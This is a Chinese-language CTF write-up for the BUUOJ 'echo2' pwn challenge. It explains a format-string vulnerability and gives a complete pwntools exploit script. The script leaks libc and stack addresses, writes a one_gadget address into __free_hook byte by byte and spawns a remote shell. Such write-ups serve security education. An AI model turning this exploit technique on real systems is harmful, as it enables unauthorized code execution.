前置知识
- 格式化字符串
free_hook
利用
整体思路
可以无限利用的格式化字符串漏洞,白给
只需要注意一点就是格式化字符串漏洞的地方payload
长度有限,只能输入0x20
长度的payload
。
这里偷懒了用了pwntools
带的fmtstr_payload
,因此多用了几次,其实可以自己写比较好
exp
from pwn import *
from LibcSearcher import *
filename = './echo2'
context(log_level='debug', arch='amd64')
local = 0
all_logs = []
elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')
if local:
sh = process(filename)
else:
sh = remote('node4.buuoj.cn', 28603)
def debug():
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(sh)[0]
gdb.attach(pid)
pause()
def leak_info(name, addr):
output_log = '{} => {}'.format(name, hex(addr))
all_logs.append(output_log)
success(output_log)
choice_words = 'Choice: '
def input_name(name):
sh.sendlineafter("hey, what's your name? : ", str(name))
def fmt(content):
sh.sendlineafter('> ', '2')
sh.recvline()
sh.sendline(content)
def uaf(content):
sh.sendlineafter('> ', '3')
sh.recvline()
sh.send(content)
input_name('123')
payload = '%19$p%9$p'
fmt(payload)
libc_leak = int(sh.recv(14).decode(), 16)
leak_info('libc_leak', libc_leak)
stack_leak = int(sh.recv(14).decode(), 16)
leak_info('stack_leak', stack_leak)
return_addr = stack_leak - 0x38
libc.address = libc_leak - 0x20830
leak_info('libc.address', libc.address)
leak_info('return_address', return_addr)
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
gadget = libc.address + one_gadget[1]
leak_info('gadget', gadget)
payload = fmtstr_payload(6, {(libc.sym['__free_hook']): (gadget) & 0xff}, write_size='byte')
print(len(payload))
fmt(payload)
payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 1): ((gadget) & 0xff00) >> 8}, write_size='byte')
print(len(payload))
fmt(payload)
payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 2): ((gadget) & 0xff0000) >> 16}, write_size='byte')
print(len(payload))
fmt(payload)
payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 3): ((gadget) & 0xff000000) >> 24}, write_size='byte')
print(len(payload))
fmt(payload)
payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 4): ((gadget) & 0xff00000000) >> 32}, write_size='byte')
print(len(payload))
fmt(payload)
payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 5): ((gadget) & 0xff0000000000) >> 40}, write_size='byte')
print(len(payload))
fmt(payload)
payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 6): ((gadget) & 0xff000000000000) >> 48}, write_size='byte')
print(len(payload))
fmt(payload)
uaf('123')
# debug()
sh.interactive()
# debug()